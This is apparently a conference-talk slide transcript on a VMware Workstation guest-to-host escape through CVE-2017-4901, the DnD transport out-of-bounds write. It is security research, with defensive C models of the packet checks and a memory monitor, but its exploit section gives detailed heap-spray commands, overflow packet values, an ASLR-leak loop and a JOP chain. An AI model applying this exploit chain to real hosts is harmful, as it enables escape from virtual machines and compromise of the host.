Out of The Truman Show:
VM escape in VMware gracefully
Lei Shi && Mei Wang
About Us
- Lei Shi is a security researcher at 360-CERT, mainly focused on cryptography security and vulnerability
discovery. He has discovered 100+ bugs and gained 20+ CVEs (e.g. the OpenSSL Death Alert) from OpenSSL,
OpenSSH and VMware. He is obsessed with math and computer security, and is currently working on
Windows Search protocol security, Linux kernel security and the development of vulnerability discovery
tools.
- Mei Wang is a security researcher in the Gear Team of Qihoo 360 Inc., mainly focused on vulnerability
discovery and fuzzing technology. In the last year she has gained 10+ CVEs from Firefox, Safari, Solr and
Libtiff. She has spoken at CanSecWest 2017 and Syscan360. She is currently working on browser
security and the development of fuzzing tools using math and machine learning.
Agenda
a. Attack surface of VMware Workstation
b. VMware RPCI and backdoor
c. VMware Fuzz Framework
d. CVE-2017-4901
e. Exploit
f. Demo
g. Conclusion
① Attack surface of VMware Workstation
- History vulnerabilities
- Attack surface
(Chart: VMware CVE history, data from http://cve.mitre.org, 17/10/24.)
- VMCI (CVE-2017-4901)
VMCI (VMware Virtual Machine Communication Interface) is a high-speed interface that
virtual machines on the same host use to communicate with each other and with the host
kernel modules. It is an optional function; when enabled, the guest can issue commands that
are processed by the vmware-vmx.exe process on the host. When VMware Tools is installed
in the guest, VMCI is enabled for communication.
- IOCTL (CVE-2014-2384)
A device input and output control interface that allows applications in user space to
communicate with VMkernel in kernel space.
- COM port (CVE-2017-4908 ~ 4913)
Features like the virtual printer are implemented on top of the COM port.
Many vulnerabilities have been found in the COM port, especially in the TrueType font parser
and the JPEG2000 parser in TPView.dll.
- Device drivers (sound card, network card, graphics card, USB, ...)
(CVE-2017-4900)
- RPCI
- Backdoor
② RPCI and Backdoor
- Backdoor: a communication mechanism between the VMware host and guest.
  Messages are sent through a special VMware I/O port.
  Multiple commands are supported.
- RPCI: Remote Procedure Call Interface
  Built on top of the backdoor.
  The guest can send requests to the host: drag and drop, copy/paste, ...
  Format: <command><parameters>
  vmware-vmx.exe handles every RPCI command.
RPCI commands used in the following sections:
  info-set / info-get
  vmx.capability.unified_loop
  tools.capability.guest_temp_directory
  guest.upgrader_send_cmd_line_args / toolsAutoInstallGetParams
  tools.capability.dnd_version
  tools.capability.copypaste_version
  vmx.capability.dnd_version
  vmx.capability.copypaste_version
  unity.window.contents.start
  unity.window.contents.chunk
  copypaste.transport
③ Fuzz Framework
- Guest
Runs a backdoor command fuzzer.
- Host
a) Page heap must be enabled.
b) A memory monitor is injected to record memory use and to capture out-of-bounds reads/writes and heap
use-before-initialization bugs. The monitor delays the freeing of objects to capture double-free and UAF
bugs.
c) Out-of-bounds accesses to stack variables are difficult to capture, so we used Pin to handle the
command-processing functions specially.
d) A stack scanner is introduced to capture stack use-before-initialization bugs.
e) Vsock is used to feed back the execution paths of some interesting functions, to help the guest-side
fuzzer constrain variable ranges better.
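As an added illustration of item b, not the authors' memory monitor, here is a minimal delayed-free quarantine in C: freed blocks are poisoned and held back in a small FIFO instead of being returned to the allocator, so a second free of the same pointer is caught while the block is still quarantined, and a write into a freed block shows up as damaged poison when the block is finally released. The quarantine depth, the poison byte and the demo sequence in run_demo are all constructed for this example.

```c
#include <stdbool.h>
#include <stdint.h>
#include <stdlib.h>
#include <string.h>

#define QUARANTINE_SLOTS 4      /* constructed: how many freed blocks are held back */
#define POISON_BYTE      0xFE   /* constructed: pattern written into freed memory */

typedef struct { unsigned char *ptr; size_t size; } QEntry;

typedef struct {
    QEntry   q[QUARANTINE_SLOTS];   /* FIFO of freed-but-not-yet-released blocks */
    size_t   head;                  /* slot that the next free will reuse */
    unsigned double_frees;          /* counters a fuzzer would report per test case */
    unsigned writes_after_free;
} MemMonitor;

static void mon_init(MemMonitor *m) { memset(m, 0, sizeof *m); }

static void *mon_alloc(MemMonitor *m, size_t size)
{
    (void)m;                        /* allocation is plain malloc in this model */
    return malloc(size);
}

/* Really release the oldest quarantined block, first checking that the poison
 * is intact: any changed byte means someone wrote through a dangling pointer. */
static void mon_evict(MemMonitor *m, QEntry *e)
{
    for (size_t i = 0; i < e->size; i++) {
        if (e->ptr[i] != POISON_BYTE) { m->writes_after_free++; break; }
    }
    free(e->ptr);
    e->ptr = NULL;
    e->size = 0;
}

/* Returns false on a double free (the pointer is still sitting in quarantine). */
static bool mon_free(MemMonitor *m, void *ptr, size_t size)
{
    for (size_t i = 0; i < QUARANTINE_SLOTS; i++) {
        if (m->q[i].ptr == ptr) { m->double_frees++; return false; }
    }
    QEntry *slot = &m->q[m->head];
    if (slot->ptr) mon_evict(m, slot);       /* make room, oldest block first */
    memset(ptr, POISON_BYTE, size);
    slot->ptr = ptr;
    slot->size = size;
    m->head = (m->head + 1) % QUARANTINE_SLOTS;
    return true;
}

/* Drain the quarantine at the end of a fuzz iteration so late writes are counted too. */
static void mon_flush(MemMonitor *m)
{
    for (size_t i = 0; i < QUARANTINE_SLOTS; i++) {
        if (m->q[i].ptr) mon_evict(m, &m->q[i]);
    }
}

/* Constructed demo.  With inject_bugs the sequence contains one write-after-free
 * and one double free; without it the sequence is clean.  Findings are returned
 * through the out-parameters. */
static void run_demo(bool inject_bugs, unsigned *double_frees, unsigned *writes_after_free)
{
    MemMonitor m;
    mon_init(&m);

    unsigned char *a = mon_alloc(&m, 0x40);
    mon_free(&m, a, 0x40);
    if (inject_bugs) a[0x10] = 0x41;        /* dangling write: a is quarantined, not released */

    unsigned char *b = mon_alloc(&m, 0x20);
    mon_free(&m, b, 0x20);
    if (inject_bugs) mon_free(&m, b, 0x20); /* second free of the same block */

    mon_flush(&m);
    *double_frees = m.double_frees;
    *writes_after_free = m.writes_after_free;
}
```

The poison check only sees writes after free; a read through a dangling pointer leaves the poison intact, which is why the slide pairs the monitor with page heap, whose guard pages trap reads as well.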
- UAF: "tools.capability.dnd_version"
When dnd_version is set to 2, an arbitrary 0x100 bytes of data can be placed in memory; then calling the
command copypaste.transport gives control of RIP and R8.
- Continuous out-of-bounds write: "copypaste.transport"
Further details are discussed later.
④ CVE-2017-4901
The Drag-and-Drop (DnD) function in VMware Workstation and Fusion has an out-of-bounds memory access
vulnerability. This may allow a guest to execute code on the operating system that runs Workstation or
Fusion.
- VMware Workstation Pro before 12.5.4
- Exists in DnD version 3
- We can control the overflow size.
- Multiple out-of-bounds writes
- Combined with some commands, an out-of-bounds read
- Information leak and arbitrary code execution if we place the out-of-bounds write/read before an
appropriate object.
- packetSize == packet->payloadSize + DND_TRANSPORT_PACKET_HEADER_SIZE
- packetSize <= DND_MAX_TRANSPORT_PACKET_SIZE
- packet->payloadSize + packet->offset <= packet->totalSize
- packet->totalSize <= DNDMSG_MAX_ARGSZ
- The totalSize of the first packet specifies the size of the buffer allocated on the heap.
- For the first packet, the member packet->offset must be 0.
- All the packets in the same message must have the same seqNum.
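The following C model, added here and not VMware's code, applies the checks listed above to the two packets used in the exploit section (h1: totalSize 0xA0, offset 0, payloadSize 0x90; h2: totalSize 0xA000, offset 0x90, payloadSize 0x20). In its lenient form it bounds offset + payloadSize by the current packet's own totalSize, exactly as the list says, and so accepts h2 even though the buffer was sized from h1; in its hardened form it records the first packet's totalSize and rejects any later packet whose totalSize differs or whose payload would end past that recorded size. The header size and the two limit constants are placeholders, since the slides do not give their values, the seqNum is a constructed value, and only sizes are tracked (no bytes are copied).

```c
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>

/* Placeholder limits (assumed): the real VMware constants are not on the slides. */
#define DND_TRANSPORT_PACKET_HEADER_SIZE 0x18u
#define DND_MAX_TRANSPORT_PACKET_SIZE    0x1000u
#define DNDMSG_MAX_ARGSZ                 0x10000u

typedef struct {
    uint32_t type;
    uint32_t seqNum;
    uint32_t totalSize;     /* claimed size of the whole message */
    uint32_t offset;        /* where this payload lands in the message buffer */
    uint32_t payloadSize;
} DnDTransportPacketHeader;

/* Per-message reassembly state.  Only sizes are tracked; no bytes are copied. */
typedef struct {
    bool     allocated;
    uint32_t allocSize;     /* totalSize of the first packet == heap buffer size */
    uint32_t seqNum;
} ReassemblyState;

typedef enum { PKT_OK = 0, PKT_REJECTED = 1, PKT_OVERRUN = 2 } PacketResult;

/* strict == false: the checks exactly as listed, bounding offset + payloadSize by
 * the current packet's own totalSize.  strict == true: additionally require the
 * totalSize to equal the size recorded at allocation and bound the write by it.
 * PKT_OVERRUN means the checks let through a payload that ends past the buffer
 * allocated for the message, which is the CVE-2017-4901 condition. */
static PacketResult dnd_transport_check(ReassemblyState *st,
                                        const DnDTransportPacketHeader *h,
                                        uint32_t packetSize, bool strict)
{
    uint64_t end = (uint64_t)h->offset + h->payloadSize;              /* no 32-bit wrap */
    uint64_t expected = (uint64_t)h->payloadSize + DND_TRANSPORT_PACKET_HEADER_SIZE;

    if (packetSize != expected)                      return PKT_REJECTED;
    if (packetSize > DND_MAX_TRANSPORT_PACKET_SIZE)  return PKT_REJECTED;
    if (h->totalSize > DNDMSG_MAX_ARGSZ)             return PKT_REJECTED;
    if (end > h->totalSize)                          return PKT_REJECTED;

    if (!st->allocated) {                 /* first packet: sizes the heap buffer */
        if (h->offset != 0) return PKT_REJECTED;
        st->allocated = true;
        st->allocSize = h->totalSize;
        st->seqNum    = h->seqNum;
        return PKT_OK;
    }

    if (h->seqNum != st->seqNum) return PKT_REJECTED;
    if (strict) {
        if (h->totalSize != st->allocSize) return PKT_REJECTED;   /* size must not change mid-message */
        if (end > st->allocSize)           return PKT_REJECTED;   /* bound by the real buffer */
    }
    return end > st->allocSize ? PKT_OVERRUN : PKT_OK;
}

/* Feed h1 from the slides (sizes the buffer at 0xA0) followed by the given h2. */
static PacketResult replay_pair(const DnDTransportPacketHeader *h2, bool strict)
{
    ReassemblyState st = { false, 0, 0 };
    DnDTransportPacketHeader h1 = { 3, 7, 0xA0, 0x00, 0x90 };   /* seqNum 7 is constructed */
    PacketResult r = dnd_transport_check(&st, &h1, 0x90 + DND_TRANSPORT_PACKET_HEADER_SIZE, strict);
    if (r != PKT_OK) return r;
    return dnd_transport_check(&st, h2, h2->payloadSize + DND_TRANSPORT_PACKET_HEADER_SIZE, strict);
}

/* h2 as on the slides: totalSize 0xA000, 0x20 bytes at offset 0x90. */
static PacketResult replay_slide_packets(bool strict)
{
    DnDTransportPacketHeader h2 = { 3, 7, 0xA000, 0x90, 0x20 };
    return replay_pair(&h2, strict);
}

/* A well-formed continuation: same totalSize, 0x10 bytes at offset 0x90, ends at 0xA0. */
static PacketResult replay_wellformed_packets(bool strict)
{
    DnDTransportPacketHeader h2 = { 3, 7, 0xA0, 0x90, 0x10 };
    return replay_pair(&h2, strict);
}

int main(void)
{
    static const char *names[] = { "ok", "rejected", "OVERRUN" };
    printf("listed checks only: slide h2 %s\n", names[replay_slide_packets(false)]);
    printf("hardened checks:    slide h2 %s\n", names[replay_slide_packets(true)]);
    return 0;
}
```

Whether the real parser also requires offsets to be sequential is not stated on the slides, so the model does not require it; pinning later packets to the size recorded at allocation is by itself enough to turn the overrun into a rejection, while a well-formed continuation still passes.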
⑤ Exploit
- To gain code execution, we need to overwrite a function pointer on the heap or the vtable of a C++ object.
- Ideally, if we place the OOB write/read before an appropriate object, we can achieve both information
disclosure (to defeat ASLR) and arbitrary code execution.
(Diagram: three adjacent heap blocks, the vulnerable transport block, the info-set/get buffer and the DnD/CP
object; the overflow from the transport block runs into the two blocks that follow it.)
LFH (Windows Low Fragmentation Heap)
The LFH is used for allocations of 1 to 16368 (0x3FF0) bytes. It prevents fragmentation with a
bucketing scheme: similarly-sized blocks are allocated from larger pre-allocated blocks of memory.
An LFH bucket is only activated once its corresponding allocation size is detected to be popular.
It is better to choose the least-used suitable block size.
LFH
If we want to allocate three contiguous memory blocks (vul trans block, info-set/get block, DnD/CP
object), we can follow the steps below.
Note: the LFH buckets for the sizes of X0, X1, Y0, Y1 and Y2 have not been activated beforehand.
LFH
A suitable and precise heap spray can form three contiguous memory buckets. Ideally, we obtain
three buckets as follows.
(Diagram: bucket n, bucket (n+1) and bucket (n+2) adjacent in the memory growth direction.)
LFH
Free and reuse a full bucket.
Normally, because of the LFH, freeing a block and then allocating the same size again does not
necessarily return the block that was just freed; a full bucket is the exception.
(Diagram: in a full bucket, free object X, then allocate object Y into its slot.)
Heap spray: vmx.capability.unified_loop
Bucket 1:
  tools.capability.guest_temp_directory 1 G000G=======
Bucket 2 (beaconStr):
  guest.upgrader_send_cmd_line_args G000G***************
Bucket 3 (set dndVersion 3):
  tools.capability.dnd_version 3
  tools.capability.copypaste_version 3
  vmx.capability.dnd_version
  vmx.capability.copypaste_version
Size: 0xB0 (0x10 header + 0xA0)
(Diagram: three adjacent buckets of 0xB0-byte sprayed blocks, each block tagged with its own two leading
bytes such as [b][c], [1][3], [a][a]; bucket 1 contains the guest_temp_directory string "G000G====...====GG0",
bucket 2 the beacon string "G000G****...****0", bucket 3 the DnD/CP object.)
Send command:
  tools.capability.guest_temp_directory 1 azbo
(Diagram: the guest_temp_directory string "G000G====...====GG0" in bucket 1 is freed; buckets 2 and 3 are
unchanged.)
  DnDTransportPacketHeader h1;
  h1.totalSize = 0xA0;
  h1.offset = 0;
  h1.payloadSize = 0x90;
Command:
  copypaste.transport &h1 000000000000000
(Diagram: the freed slot in bucket 1 is reoccupied by the transport buffer, now holding the zero payload;
buckets 2 and 3 are unchanged.)
  DnDTransportPacketHeader h1;
  h1.type = 3;
  h1.seqNum = seq;
  h1.totalSize = 0xA0;
  h1.offset = 0;
  h1.payloadSize = 0x90;
Command:
  copypaste.transport &h1 000000000000000
(Diagram: the transport buffer occupies a 0xB0-byte block, a 0x10-byte heap header followed by the 0xA0-byte
totalSize area; the first packet's 0x90-byte payload fills offsets 0 to 0x90, and the following 0xB0-byte
blocks each begin with their own 0x10-byte header.)
  DnDTransportPacketHeader h2;
  h2.type = h1.type = 3;
  h2.seqNum = h1.seqNum = seq;
  h2.totalSize = 0xA000;
  h2.offset = h1.payloadSize = 0x90;
  h2.payloadSize = 0x20;
Command:
  copypaste.transport &h2 000000000000000
(Diagram: the second packet's 0x20-byte payload starts at offset 0x90, so it fills the last 0x10 bytes of the
0xA0 area and overwrites the 0x10-byte heap header of the next block; the write position advances to offset
0xB0.)
  h2.offset = 0x90 + 0x20 = 0xB0;
  h2.payloadSize = 0xA0 + 0x10 = 0xB0;
Command:
  copypaste.transport &h2 000000000000000
(Diagram: with offset 0xB0 and payloadSize 0xB0 a single packet overwrites exactly one following 0xB0-byte
block, header and body; the write position advances to offset 0x160, and each further packet covers the
next block.)
Search loop (pseudocode):
  pos = 0;
  while (TRUE) {
      overwrite 0xB0;                          // copypaste.transport, one more block each time
      if (pos == 0) {
          command: ToolsAutoInstallGetParams
          Message_Receive(chan, &buf, &rsize);
          if (buf[2] == '0') {                 // beaconStr (bucket 2) has been overwritten
              pos = 0xB0;
              if (rsize > pos + 4)
                  if (buf[pos+2] == 0x40 && buf[pos+3] == 0x9A)
                      calculate base address
          }
      } else {
          pos += 0xB0;
          command: ToolsAutoInstallGetParams
          Message_Receive(chan, &buf, &rsize);
          if (rsize > pos + 4)
              if (buf[pos+2] == 0x40 && buf[pos+3] == 0x9A)
                  calculate base address
      }
  }
(Diagram: each iteration replaces one more 0xB0-byte block with zeros, first the beacon string
"G000G****...****0" in bucket 2 (its block starts with the flag bytes [flag1][flag2]), then the blocks beyond
it; when pos reaches the DnD/CP object the bytes 40 9A xx xx xx xx 00 00 appear in the data read back, and
the 40 9A pair is checked at buf[pos+2] and buf[pos+3].)
Calculate base
ASLR does not change the lowest two bytes of an address.
(Diagram: the first bytes of the DnD/CP object, 40 9A xx xx xx xx 00 00, followed by unknown bytes.)
Layout
unity.window.contents.start
unity.window.contents.chunk
(Diagram: the overwritten DnD/CP object points at the fixed address X in the global variable area, where the
JOP table (jop, jop, jop, jop, ...) is built.)
Global variable area at X:
  [X+0x08] window_id       low 32 bits of the JOP address
  [X+0x0C] counter         high 32 bits of the JOP address
  [X+0x10] window_width    low 32 bits of the original address
  [X+0x14] window_height   high 32 bits of the original address
  [X+0x28] contents_base   address of the string calc.exe
1. Close the vmtoolsd process
To reduce interference, find the VMwareDragDetWndClass window and send it WM_CLOSE.
2. Fill memory fragmentation
Loop 0x4A80 times.
Use vmx.capability.unified_loop instead of info-set for the heap spray.
Size 0xA0 + 0x10.
Keep the first two bytes of each block unique.
3. Generate three full buckets
A suitable and precise heap spray can form three contiguous memory buckets.
In practice, however, info-set/get is unreliable: it allocates memory multiple times and leaves holes.
Use guest.upgrader_send_cmd_line_args and ToolsAutoInstallGetParams in place of info-set and info-get.
3. Generate three full buckets (continued)
For the first bucket, use tools.capability.guest_temp_directory to occupy the position.
For the second bucket, insert a readable string, BeaconStr, using "guest.upgrader_send_cmd_line_args".
For the third bucket, set up a DnD/CP version 3 object:
  tools.capability.dnd_version 3
  tools.capability.copypaste_version 3
  vmx.capability.dnd_version
  vmx.capability.copypaste_version
Call "tools.capability.guest_temp_directory" again to remove the first placeholder, and use the vulnerable
transport block to reoccupy the first bucket.
4. Find BeaconStr
Call "copypaste.transport" to keep overwriting the memory that follows, 0xB0 bytes at a time.
Use ToolsAutoInstallGetParams to read the BeaconStr in the second bucket until its contents are found
to have changed.
5. Find the DnD/CP version 3 object
Call copypaste.transport to keep overwriting the memory that follows, 0xB0 bytes at a time.
Use ToolsAutoInstallGetParams to read the BeaconStr in the second bucket until the desired address
shows up (ASLR does not change the lowest two bytes of the address).
6. Calculate the base address and verify that it is valid
Calculate the base address.
7. Layout
Now that we have the base address, we calculate the addresses we need.
Call unity.window.contents.start and lay out the low 32 bits of the JOP address and of the original call
address in the global variable area.
Call unity.window.contents.chunk and use its counter field to push the high 32 bits of the JOP address;
also put the address of the string "C:\windows\system32\calc.exe" into contents_base.
Final layout, if the fixed address is X:
  window_id     = X+0x08; // low 32 bits of the JOP address
  counter       = X+0x0C; // high 32 bits of the JOP address
  window_width  = X+0x10; // low 32 bits of the original call address
  window_height = X+0x14; // high 32 bits of the original call address
  contents_base = X+0x28; // address of the string C:\windows\system32\calc.exe
8. Overwrite the DnD/CP version 3 object
Call copypaste.transport again and overwrite 8 bytes with the address X.
9. JOP
We can control R8 when calling "copypaste.transport".
  unsigned long long jop[] = { j0, d0, 0, j1, 0, j2, 0, 0, j3, 0, 0, 0,
      j4, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
      0, 0, 0, 0, 0, 0, j5, 0, 0, d1 };
  Message_Send(channel, jop, sizeof(jop));
Start = JOP_base (from step 7):
  mov rcx, r8
  call qword ptr [r8+60h]    // to j4
j4:
  mov rdx, [r8+8]            // d0
  call qword ptr [r8]        // to j0
j0:
  mov rax, rdx
  mov rdx, [rcx+170h]        // d1
  mov r8, rcx
  mov rcx, rax
  jmp qword ptr [r8+158h]    // to j5
j5:
  mov [rdx+28h], rax
  jmp qword ptr [r8+18h]     // to j1
j1:
  pop rdi
  jmp qword ptr [r8+28h]     // to j2
j2:
  pop rdi
  jmp qword ptr [r8+40h]     // to j3
j3:
  xxx
10. Recovery
Reverse the JOP operations of the previous step.
⑥ Demo
⑦ Conclusion
- The success rate of our exploit exceeds 95% (96.7%).
- No pwn no fun.
Shilei-c@360.cn
wangmei.S102@gmail.com
Any Questions?
Thanks!

BlueHat Seattle 2019 || Don't forget to SUBSCRIBE.
 
BlueHat Seattle 2019 || I'm in your cloud: A year of hacking Azure AD
BlueHat Seattle 2019 || I'm in your cloud: A year of hacking Azure ADBlueHat Seattle 2019 || I'm in your cloud: A year of hacking Azure AD
BlueHat Seattle 2019 || I'm in your cloud: A year of hacking Azure AD
 
BlueHat Seattle 2019 || Autopsies of Recent DFIR Investigations
BlueHat Seattle 2019 || Autopsies of Recent DFIR InvestigationsBlueHat Seattle 2019 || Autopsies of Recent DFIR Investigations
BlueHat Seattle 2019 || Autopsies of Recent DFIR Investigations
 
BlueHat Seattle 2019 || The good, the bad & the ugly of ML based approaches f...
BlueHat Seattle 2019 || The good, the bad & the ugly of ML based approaches f...BlueHat Seattle 2019 || The good, the bad & the ugly of ML based approaches f...
BlueHat Seattle 2019 || The good, the bad & the ugly of ML based approaches f...
 
BlueHat Seattle 2019 || Are We There Yet: Why Does Application Security Take ...
BlueHat Seattle 2019 || Are We There Yet: Why Does Application Security Take ...BlueHat Seattle 2019 || Are We There Yet: Why Does Application Security Take ...
BlueHat Seattle 2019 || Are We There Yet: Why Does Application Security Take ...
 
BlueHat Seattle 2019 || Building Secure Machine Learning Pipelines: Security ...
BlueHat Seattle 2019 || Building Secure Machine Learning Pipelines: Security ...BlueHat Seattle 2019 || Building Secure Machine Learning Pipelines: Security ...
BlueHat Seattle 2019 || Building Secure Machine Learning Pipelines: Security ...
 
BlueHat v18 || First strontium uefi rootkit unveiled
BlueHat v18 || First strontium uefi rootkit unveiledBlueHat v18 || First strontium uefi rootkit unveiled
BlueHat v18 || First strontium uefi rootkit unveiled
 
BlueHat v18 || WSL reloaded - Let's try to do better fuzzing
BlueHat v18 || WSL reloaded - Let's try to do better fuzzingBlueHat v18 || WSL reloaded - Let's try to do better fuzzing
BlueHat v18 || WSL reloaded - Let's try to do better fuzzing
 
BlueHat v18 || The hitchhiker's guide to north korea's malware galaxy
BlueHat v18 || The hitchhiker's guide to north korea's malware galaxyBlueHat v18 || The hitchhiker's guide to north korea's malware galaxy
BlueHat v18 || The hitchhiker's guide to north korea's malware galaxy
 
BlueHat v18 || Retpoline - the anti-spectre (type 2) mitigation in windows
BlueHat v18 || Retpoline - the anti-spectre (type 2) mitigation in windowsBlueHat v18 || Retpoline - the anti-spectre (type 2) mitigation in windows
BlueHat v18 || Retpoline - the anti-spectre (type 2) mitigation in windows
 
BlueHat v18 || Memory resident implants - code injection is alive and well
BlueHat v18 || Memory resident implants - code injection is alive and wellBlueHat v18 || Memory resident implants - code injection is alive and well
BlueHat v18 || Memory resident implants - code injection is alive and well
 
BlueHat v18 || Massive scale usb device driver fuzz without device
BlueHat v18 || Massive scale usb device driver fuzz without deviceBlueHat v18 || Massive scale usb device driver fuzz without device
BlueHat v18 || Massive scale usb device driver fuzz without device
 
BlueHat v18 || Modern day entomology - examining the inner workings of the bu...
BlueHat v18 || Modern day entomology - examining the inner workings of the bu...BlueHat v18 || Modern day entomology - examining the inner workings of the bu...
BlueHat v18 || Modern day entomology - examining the inner workings of the bu...
 
BlueHat v18 || The matrix has you - protecting linux using deception
BlueHat v18 || The matrix has you - protecting linux using deceptionBlueHat v18 || The matrix has you - protecting linux using deception
BlueHat v18 || The matrix has you - protecting linux using deception
 

Último

Data Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt RobisonData Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt RobisonAnna Loughnan Colquhoun
 
Exploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone ProcessorsExploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone Processorsdebabhi2
 
Understanding Discord NSFW Servers A Guide for Responsible Users.pdf
Understanding Discord NSFW Servers A Guide for Responsible Users.pdfUnderstanding Discord NSFW Servers A Guide for Responsible Users.pdf
Understanding Discord NSFW Servers A Guide for Responsible Users.pdfUK Journal
 
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers:  A Deep Dive into Serverless Spatial Data and FMECloud Frontiers:  A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FMESafe Software
 
Automating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps ScriptAutomating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps Scriptwesley chun
 
A Year of the Servo Reboot: Where Are We Now?
A Year of the Servo Reboot: Where Are We Now?A Year of the Servo Reboot: Where Are We Now?
A Year of the Servo Reboot: Where Are We Now?Igalia
 
Artificial Intelligence Chap.5 : Uncertainty
Artificial Intelligence Chap.5 : UncertaintyArtificial Intelligence Chap.5 : Uncertainty
Artificial Intelligence Chap.5 : UncertaintyKhushali Kathiriya
 
The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024Rafal Los
 
Why Teams call analytics are critical to your entire business
Why Teams call analytics are critical to your entire businessWhy Teams call analytics are critical to your entire business
Why Teams call analytics are critical to your entire businesspanagenda
 
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024The Digital Insurer
 
Polkadot JAM Slides - Token2049 - By Dr. Gavin Wood
Polkadot JAM Slides - Token2049 - By Dr. Gavin WoodPolkadot JAM Slides - Token2049 - By Dr. Gavin Wood
Polkadot JAM Slides - Token2049 - By Dr. Gavin WoodJuan lago vázquez
 
AWS Community Day CPH - Three problems of Terraform
AWS Community Day CPH - Three problems of TerraformAWS Community Day CPH - Three problems of Terraform
AWS Community Day CPH - Three problems of TerraformAndrey Devyatkin
 
Deploy with confidence: VMware Cloud Foundation 5.1 on next gen Dell PowerEdg...
Deploy with confidence: VMware Cloud Foundation 5.1 on next gen Dell PowerEdg...Deploy with confidence: VMware Cloud Foundation 5.1 on next gen Dell PowerEdg...
Deploy with confidence: VMware Cloud Foundation 5.1 on next gen Dell PowerEdg...Principled Technologies
 
HTML Injection Attacks: Impact and Mitigation Strategies
HTML Injection Attacks: Impact and Mitigation StrategiesHTML Injection Attacks: Impact and Mitigation Strategies
HTML Injection Attacks: Impact and Mitigation StrategiesBoston Institute of Analytics
 
🐬 The future of MySQL is Postgres 🐘
🐬  The future of MySQL is Postgres   🐘🐬  The future of MySQL is Postgres   🐘
🐬 The future of MySQL is Postgres 🐘RTylerCroy
 
TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law DevelopmentsTrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law DevelopmentsTrustArc
 
A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)Gabriella Davis
 
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...apidays
 
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024The Digital Insurer
 
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerThousandEyes
 

Último (20)

Data Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt RobisonData Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt Robison
 
Exploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone ProcessorsExploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone Processors
 
Understanding Discord NSFW Servers A Guide for Responsible Users.pdf
Understanding Discord NSFW Servers A Guide for Responsible Users.pdfUnderstanding Discord NSFW Servers A Guide for Responsible Users.pdf
Understanding Discord NSFW Servers A Guide for Responsible Users.pdf
 
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers:  A Deep Dive into Serverless Spatial Data and FMECloud Frontiers:  A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
 
Automating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps ScriptAutomating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps Script
 
A Year of the Servo Reboot: Where Are We Now?
A Year of the Servo Reboot: Where Are We Now?A Year of the Servo Reboot: Where Are We Now?
A Year of the Servo Reboot: Where Are We Now?
 
Artificial Intelligence Chap.5 : Uncertainty
Artificial Intelligence Chap.5 : UncertaintyArtificial Intelligence Chap.5 : Uncertainty
Artificial Intelligence Chap.5 : Uncertainty
 
The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024
 
Why Teams call analytics are critical to your entire business
Why Teams call analytics are critical to your entire businessWhy Teams call analytics are critical to your entire business
Why Teams call analytics are critical to your entire business
 
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
 
Polkadot JAM Slides - Token2049 - By Dr. Gavin Wood
Polkadot JAM Slides - Token2049 - By Dr. Gavin WoodPolkadot JAM Slides - Token2049 - By Dr. Gavin Wood
Polkadot JAM Slides - Token2049 - By Dr. Gavin Wood
 
AWS Community Day CPH - Three problems of Terraform
AWS Community Day CPH - Three problems of TerraformAWS Community Day CPH - Three problems of Terraform
AWS Community Day CPH - Three problems of Terraform
 
